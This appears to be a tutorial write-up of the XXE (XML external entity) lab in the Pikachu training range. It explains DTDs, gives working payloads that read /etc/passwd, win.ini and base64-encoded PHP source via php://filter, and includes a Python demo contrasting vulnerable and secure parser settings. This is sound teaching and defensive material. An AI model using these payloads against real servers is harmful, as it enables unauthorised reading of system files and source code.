Pikachu-XXE (xml external entity injection vulnerability)

XXE stands for "XML External Entity injection", also written "XML external entity injection vulnerability".
In short: the attacker injects a specially crafted XML entity into content sent to the server; the server then resolves that entity according to the attacker's definition, which causes problems such as the local file disclosure shown below.
The root cause is that the server receives XML from the client and parses it without strict security controls, so entities that reference external resources are resolved.

There are plenty of introductions to XML entities on the web; read one of those first if the concept is new.
Today many languages' XML parsing functions disable resolution of external entity content by default, which directly avoids this vulnerability.
PHP, for example, parses XML with libxml, and from libxml 2.9.0 onwards external entity content is not resolved by default.


Part 1: XML declaration

<?xml version="1.0"?>


Part 2: Document type definition (DTD)

<!DOCTYPE note [

<!-- this document is of the "note" document type -->

<!ENTITY entity-name SYSTEM "URI/URL">

<!-- external entity declaration -->

]>


Part 3: Document element

<note>

<to>Dave</to>

<from>Tom</from>

<head>Reminder</head>

<body>You are a good man</body>

</note>


Here the DTD (Document Type Definition) defines the grammar constraints of the XML document. It can be declared inline in the document (an internal subset) or it can reference an external DTD; the entity declarations that XXE abuses live in this part.

Internal DTD declaration: <!DOCTYPE root-element [ element declarations ]>

External DTD reference: <!DOCTYPE root-element SYSTEM "URI of the external DTD">

Public DTD reference: <!DOCTYPE root-element PUBLIC "DTD public identifier" "URI of the public DTD">

External entity reference payload (the entity f is declared with SYSTEM, so the parser fetches the URI and substitutes its content for &f;):

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY f SYSTEM "file:///etc/passwd">

]>

<x>&f;</x>


1. PHP's simplexml_load_string() converts a well-formed XML string into a SimpleXMLElement object.

PHP parses XML with libxml, and from libxml 2.9.0 onwards external entity content is not resolved by default.

To simulate the vulnerability for this chapter, Pikachu explicitly passes the LIBXML_NOENT option to the parser, which turns external entity substitution back on. The fix is the mirror image: do not pass LIBXML_NOENT when parsing untrusted XML, and on older libxml (before 2.9.0) call libxml_disable_entity_loader(true) before parsing.


2. Submit normal XML data. This uses an internal entity (a literal value rather than a SYSTEM URI), and the page echoes the substituted value "test" back:

<?xml version = "1.0"?><!DOCTYPE note [

    <!ENTITY hacker "test">

]><name>&hacker;</name>


3. If we submit the following payload instead, the parser reads the referenced file and the page displays its contents (here a Windows target, so win.ini stands in for /etc/passwd):

<?xml version = "1.0"?><!DOCTYPE ANY [

    <!ENTITY f SYSTEM "file:///C://Windows//win.ini">

]><x>&f;</x>


4. Try the php:// filter pseudo-protocol to print the base64-encoded source of xxe.php. The base64 wrapper matters: raw PHP source contains characters such as "<" and "&" that are not well-formed XML text, so reading it directly makes the parser fail instead of leaking it, whereas base64 output is always parseable and can be decoded afterwards:

<?xml version = "1.0"?>

<!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]> 

<x>&f;</x>
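The whole procedure above (steps 1 to 4, and the /etc/passwd payload earlier on the page), as an added example that is not part of Pikachu or this post. Pikachu's vulnerable page is PHP, so this reproduces the same parser behaviour with Python's standard-library SAX parser: its feature_external_ges flag plays the role of LIBXML_NOENT, since external general entities are ignored by default and only resolved when the application opts in. Every file and file content below is constructed for the demo; the function and variable names are the example's own.

```python
"""XXE demo: vulnerable vs secure parser settings, file read, and why base64 is used.

Added example, not code from Pikachu. Assumes Python 3.8+ (xml.sax ignores
external general entities by default since 3.7.1). All inputs are constructed.
"""
import base64
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler

# Constructed sample contents; they stand in for /etc/passwd (or win.ini) and xxe.php.
PASSWD_SAMPLE = b"root:x:0:0:root:/root:/bin/bash\n"
PHP_SOURCE = b"<?php include 'db.php'; ?>\n<h1>Tom & Jerry</h1>\n"


class TextCollector(handler.ContentHandler):
    """Collects the document's character data, i.e. what the page would echo back."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def xxe_payload(system_id: str) -> bytes:
    """Build the page's step-3/step-4 payload: an external entity with an attacker-chosen SYSTEM URI."""
    return (
        '<?xml version="1.0"?>'
        '<!DOCTYPE ANY [ <!ENTITY f SYSTEM "{}"> ]>'
        '<x>&f;</x>'
    ).format(system_id).encode()


def parse_untrusted(xml_bytes: bytes, resolve_external: bool):
    """Parse client-supplied XML and return its text content.

    resolve_external=True mirrors Pikachu passing LIBXML_NOENT; False is the
    secure default. Returns None when the entity's content makes the document
    not well-formed (the parser raises instead of leaking anything).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except xml.sax.SAXParseException:
        return None
    return "".join(collector.parts)


def demo():
    """Run the page's scenarios against constructed files in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        passwd = tmp / "passwd"
        passwd.write_bytes(PASSWD_SAMPLE)
        php_src = tmp / "xxe.php"
        php_src.write_bytes(PHP_SOURCE)
        # What php://filter/read=convert.base64-encode does on the server, simulated
        # here by writing the base64 form to a file the entity can reference.
        php_b64 = tmp / "xxe.php.b64"
        php_b64.write_bytes(base64.b64encode(PHP_SOURCE))

        results = {
            # step 3: plain file read against the vulnerable (NOENT-like) parser
            "file_vulnerable": parse_untrusted(xxe_payload(passwd.as_uri()), True),
            # same payload against the secure default: the entity is skipped, nothing leaks
            "file_secure": parse_untrusted(xxe_payload(passwd.as_uri()), False),
            # raw PHP/HTML source is not well-formed XML text ("&" followed by a space),
            # so the read fails instead of leaking
            "php_raw": parse_untrusted(xxe_payload(php_src.as_uri()), True),
            # step 4: base64 text is always well-formed; decode it afterwards
            "php_b64": parse_untrusted(xxe_payload(php_b64.as_uri()), True),
        }
    if results["php_b64"] is not None:
        results["php_decoded"] = base64.b64decode(results["php_b64"]).decode()
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The secure branch shows the check a reviewer wants on any XML endpoint: with external entities left at their default-off setting the same payload parses cleanly and returns no file content, so the bug on the Pikachu page is entirely the opt-in flag, not the payload.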


Source: www.cnblogs.com/joker-vip/p/12355165.html